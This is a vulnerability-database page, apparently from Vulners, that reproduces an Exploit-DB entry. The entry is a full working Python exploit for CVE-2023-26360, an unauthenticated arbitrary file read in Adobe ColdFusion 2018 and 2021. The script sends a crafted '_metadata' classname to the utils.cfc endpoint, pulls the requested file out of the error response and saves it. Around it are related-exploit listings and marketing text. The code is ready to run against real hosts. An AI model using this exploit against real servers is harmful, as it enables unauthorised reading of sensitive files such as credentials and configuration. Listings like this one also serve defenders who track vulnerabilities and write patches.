Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read

🗓️ 11 Mar 2024 00:00:00Reported by Youssef MuhammadType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 276 Views

Adobe ColdFusion Arbitrary File Read CVE-2023-2636

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Adobe ColdFusion Unauthenticated Remote Code Execution Exploit
2 May 202300:00
zdt
0day.today		Adobe ColdFusion v 2018,15 (and earlier) and 2021,5 and earlier - Arbitrary File Read Exploit
11 Mar 202400:00
zdt
GithubExploit		Exploit for Improper Access Control in Adobe Coldfusion
28 Oct 202504:10
githubexploit
GithubExploit		Exploit for Improper Access Control in Adobe Coldfusion
16 May 202619:00
githubexploit
GithubExploit		Exploit for Improper Access Control in Adobe Coldfusion
25 Nov 202417:42
githubexploit
GithubExploit		Exploit for Improper Access Control in Adobe Coldfusion
14 May 202411:22
githubexploit
ICS		Threat Actors Exploit Adobe ColdFusion CVE-2023-26360 for Initial Access to Government Servers
5 Dec 202312:00
ics
ATTACKERKB		CVE-2023-26359
14 Mar 202300:00
attackerkb
ATTACKERKB		CVE-2023-29298
12 Jul 202300:00
attackerkb
ATTACKERKB		CVE-2023-26360
23 Mar 202300:00
attackerkb
Rows per page
# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360
# Google Dork: [not]
# Date: [12/28/2023]
# Exploit Author: [Youssef Muhammad]
# Vendor Homepage: [
https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]
# Software Link: [
https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and
earlier]
# Tested on: [Windows, Linux]
# CVE : [CVE-2023-26360]

import sys
import requests
import json

BANNER = """
   ██████ ██    ██ ███████       ██████   ██████  ██████  ██████        ██████   ██████  ██████   ██████   ██████  
  ██      ██    ██ ██                 ██ ██  ████      ██      ██            ██ ██            ██ ██       ██  ████ 
  ██      ██    ██ █████   █████  █████  ██ ██ ██  █████   █████  █████  █████  ███████   █████  ███████  ██ ██ ██ 
  ██       ██  ██  ██            ██      ████  ██ ██           ██       ██      ██    ██      ██ ██    ██ ████  ██ 
   ██████   ████   ███████       ███████  ██████  ███████ ██████        ███████  ██████  ██████   ██████   ██████                                                                                                                                                                                                                                       
"""

RED_COLOR = "\033[91m"
GREEN_COLOR = "\032[42m"
RESET_COLOR = "\033[0m"

def print_banner():
    print(RED_COLOR + BANNER + "                  Developed by SecureLayer7" + RESET_COLOR)
    return 0

def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):
    if not endpoint.endswith('.cfc'):
        endpoint += '.cfc'

    if target_file.endswith('.cfc'):
        raise ValueError('The TARGET_FILE must not point to a .cfc')

    targeted_file = f"a/{target_file}"
    json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})

    vars_get = {'method': 'test', '_cfclient': 'true'}
    uri = f'{host}{endpoint}'

    response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)

    file_data = None
    splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'

    if response.status_code in [404, 500] and splatter in response.text:
        file_data = response.text.split(splatter, 1)[0]

    if file_data is None:
        raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')

    print(file_data)

    # Save the output to a file
    output_file_name = 'output.txt'
    with open(output_file_name, 'w') as output_file:
        output_file.write(file_data)
        print(f"The output saved to {output_file_name}")

if __name__ == "__main__":
    if not 3 <= len(sys.argv) <= 5:
        print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")
        sys.exit(1)

    print_banner()

    host = sys.argv[1]
    target_file = sys.argv[2]
    endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"
    proxy_url = sys.argv[4] if len(sys.argv) > 4 else None

    try:
        run_exploit(host, target_file, endpoint, proxy_url)
    except Exception as e:
        print(f"Error: {e}")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2024 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.18.6 - 9.8
EPSS0.9433
SSVC
arbitrary file readadobe coldfusioncve-2023-26360file exploitsecurity vulnerabilitywindowslinux
276